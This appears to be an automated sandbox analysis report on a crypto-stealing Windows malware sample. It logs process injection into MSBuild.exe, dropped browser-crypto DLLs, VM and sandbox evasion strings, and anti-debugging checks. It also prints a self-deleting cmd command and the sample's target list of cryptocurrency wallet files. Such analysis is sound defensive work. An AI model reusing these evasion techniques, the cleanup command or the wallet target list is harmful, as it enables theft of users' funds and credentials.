                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\msvcp140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\AFCBAEBAEBFH\freebl3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00417645
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe PID: 6580, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR
                    Source: c:\users\user\desktop\securiteinfo.com.win32.malware-gen.198.6512.exeEvent Logs and Signature results: Application crash and keyboard check
                    Source: MSBuild.exeBinary or memory string: DIR_WATCH.DLL
                    Source: MSBuild.exeBinary or memory string: SBIEDLL.DLL
                    Source: MSBuild.exeBinary or memory string: API_LOG.DLL
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\AFCBAEBAEBFH\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\AFCBAEBAEBFH\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\AFCBAEBAEBFH\freebl3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 9.3 %
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 7032Thread sleep count: 89 > 30Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h1_2_0040FCE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00401162
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004162AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,1_2_004153F6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B463
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004094E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040C679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00415AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409F72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00409900
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040A981
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00415E66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_00415843
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FE81 GetSystemInfo,wsprintfA,1_2_0040FE81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: MSBuild.exe, 00000001.00000002.2045233748.00000000010A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: MSBuild.exe, 00000001.00000002.2047307875.0000000007D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarem F5
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: MSBuild.exe, 00000001.00000002.2047307875.0000000007D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeAPI call chain: ExitProcess graph end nodegraph_0-58062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_1-53585
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D06948B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D01B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6D01B6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401000 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,1_2_00401000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D06B144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041937F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041E438 SetUnhandledExceptionFilter,1_2_0041E438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041A8A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD0AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CD0AC62
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe PID: 6580, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_004111BE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42E000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 641000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A1E008Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & rd /s /q "C:\ProgramData\AFCBAEBAEBFH" & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD54760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,1_2_6CD54760
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0684B0 cpuid 0_2_6D0684B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_0040FCE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06A25A GetSystemTimeAsFileTime,__aulldiv,0_2_6D06A25A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,1_2_0040FBCB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_0040FC92
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.5a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe PID: 6580, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia 